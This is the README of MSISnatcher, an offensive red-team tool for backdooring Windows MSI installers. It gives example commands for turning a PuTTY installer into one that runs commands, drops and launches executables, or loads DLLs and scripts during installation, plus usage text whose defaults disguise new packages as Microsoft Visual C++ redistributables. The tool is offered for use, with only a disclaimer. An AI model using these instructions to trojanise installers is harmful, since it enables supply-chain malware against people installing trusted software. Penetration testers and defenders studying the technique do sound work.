# MSISnatcher

Your MSI Backdooring companion! 

A script that takes MSI on input and then by manipulating its tables & inserting malicious records, backdoors it to run our malware during installation.


## Examples

1. Execute something during MSI installation:

```
py msisnatcher.py -i putty-installer.msi execute -1 calc putty-backdoored.msi
```

2. Run EXE dropped to `C:\Windows\Installer\MSIXXXX.tmp` and run it during installation:

```
py msisnatcher.py -i putty-installer.msi run-exe -1 malware.exe putty-backdoored.msi
```

3. Load DLL (or .NET DLL) during installation (`MyMethod` is a DLL exported function name to invoke):

```
py msisnatcher.py -i putty-installer.msi load-dll -1 malware.dll -2 MyMethod putty-backdoored.msi
```

4. Load VBscript/JScript during installation (`MyMethod` is a name of a function defined in the script file, to be executed):

```
py msisnatcher.py -i putty-installer.msi load-dll -1 malware.vbs -2 RunMalware putty-backdoored.msi
```

## Usage

```
usage:
Usage: msi-snatcher.py [options] <attack> <outfile.msi> [params]

options:
  -h, --help            show this help message and exit

Required arguments:
  attack                Specifies MSI attack action to inject. Supported attacks: drop-files, execute, script, run-exe, load-dll, dotnet
  outfile               Output produced/backdoored MSI file.

Options:
  -i INFILE, --infile INFILE
                        Backdoors input MSI file and saves it to <outfile>
  -v, --verbose         Verbose mode.
  -d, --debug           Debug mode.

Attack Parameters:
  -1 PARAM1, --param1 PARAM1
                        Attack specific #1 parameter
  -2 PARAM2, --param2 PARAM2
                        Attack specific #2 parameter
  -3 PARAM3, --param3 PARAM3
                        Attack specific #3 parameter
  -4 PARAM4, --param4 PARAM4
                        Attack specific #4 parameter
  -5 PARAM5, --param5 PARAM5
                        Attack specific #5 parameter

Properties used when creating a new MSI:
  -n NAME, --name NAME  Specifies application name. Default: "Microsoft Visual C++ 2013 Redistributable (64) - 12.0.RANDOM"
  -V VER, --app-version VER
                        Specifies product version. Default: "12.0.0.0"
  -g GUID, --guid GUID  Specifies application GUID. Default: random
  -m VENDOR, --manufacturer VENDOR
                        Specifies application manufacturer/vendor/company. Default: "Microsoft Corporation"

=====================================================

Supported MSI attacks:

   1. drop-files

        Save file(s) to system with option to run them after install.

        Attack Parameters:
                --param1 - Path to file(s)/directory to be bundled into MSI and later dropped onto infected system.
                --param2 - (optional) Run file #1 after installation. If neither --param2 nor --param4 are used, MSI will run file from --param1
                --param3 - (optional) Command line parameters for file #1
                --param4 - (optional) Target directory where to drop file. Can be: --param4 "C:\Users\Public" or --param4 "%LOCALAPPDATA%" or --param4 TARGETDIR (default)

   2. execute

        Run specified system command(s).

        Attack Parameters:
                --param1 - Command #1 to run

   3. script

        Run VBScript/JScript inside of msiexec.exe right after installation via CustomAction.

        Attack Parameters:
                --param1 - Path to VBscript/JScript file to execute
                --param2 - Function name defined in script to be invoked.

   4. run-exe

        Run Executable that will be extracted to C:\Windows\Installer\RANDOM.tmp and run by services.exe -> msiexec.exe

        Attack Parameters:
                --param1 - Path to executable to launched.
                --param2 - (optional) Command line parameters for executable

   5. load-dll

        Loads DLL into msiexec.exe during install via CustomAction DllEntry.

        Attack Parameters:
                --param1 - Path to DLL file to load
                --param2 - DLL Export function name

   6. dotnet

        Loads .NET DLL into msiexec.exe during install via CustomAction DllEntry (its the same action as load-dll).

        Attack Parameters:
                --param1 - Path to DLL file to load
                --param2 - DLL Export (adnotated) function name

=====================================================

```


---

## Disclaimer

Use of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. 
This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.  
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.

The tool exposes handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.

---

### ☕ Show Support ☕

This and other projects are outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,
[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪 

---

## Author

```   
   Mariusz Banach / mgeeky, '22-'23
   <mb [at] binary-offensive.com>
   (https://github.com/mgeeky) 
```